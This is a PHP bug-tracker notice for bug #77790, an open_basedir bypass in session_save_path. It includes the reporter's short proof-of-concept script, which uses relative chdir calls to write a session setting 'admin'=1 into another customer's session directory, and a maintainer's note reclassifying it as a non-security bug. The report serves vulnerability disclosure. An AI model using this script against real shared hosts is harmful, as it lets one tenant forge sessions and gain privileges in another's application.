Sec Bug->Bug #77790 [Opn]: open_basedir bypass in session_save_path
| From: | cmb@php.net | Date: | Mon, 12 Jul 2021 15:38:01 +0000 |
| Subject: | Sec Bug->Bug #77790 [Opn]: open_basedir bypass in session_save_path | ||
| References: | 1 | Groups: | php.bugs |
| Request: | Send a blank email to php-bugs+get-234979@lists.php.net to get a copy of this message | ||
Edit report at https://bugs.php.net/bug.php?id=77790&edit=1
ID: 77790
Updated by: cmb@php.net
Reported by: adamiwaniuk at gmail dot com
Summary: open_basedir bypass in session_save_path
Status: Open
-Type: Security
+Type: Bug
Package: Session related
Operating System: Linux
PHP Version: 7.2.16
Block user comment: N
Private report: Y
New Comment:
open_basedir bypasses are not considered to be security issues;
cf. <https://externals.io/message/105606>
and <https://externals.io/message/115406>.
Previous Comments:
------------------------------------------------------------------------
[2019-03-24 21:55:32] adamiwaniuk at gmail dot com
Description:
------------
initial script directory: /var/www/html
open_basedir setting: /var/www/html
initial session save path: default
after executing test script, session is saved in the /other-customer-session-dir location
Test script:
---------------
<?php
echo session_save_path()."<br>";
mkdir("a");
mkdir("a/b");
mkdir("a/b/c");
chdir("a/b/c");
session_save_path("../../../other-customer-session-dir");
chdir("../../..");
echo session_save_path()."<br>";
session_start();
$_SESSION['admin']=1;
Expected result:
----------------
session is not saved in /other-customer-session-dir because this is outside open_basedir and inital
location (when removed chdir from this code
session_save_path("../../../other-customer-session-dir"); fails)
Actual result:
--------------
session is saved in /other-customer-session-dir
------------------------------------------------------------------------
--
Edit this bug report at https://bugs.php.net/bug.php?id=77790&edit=1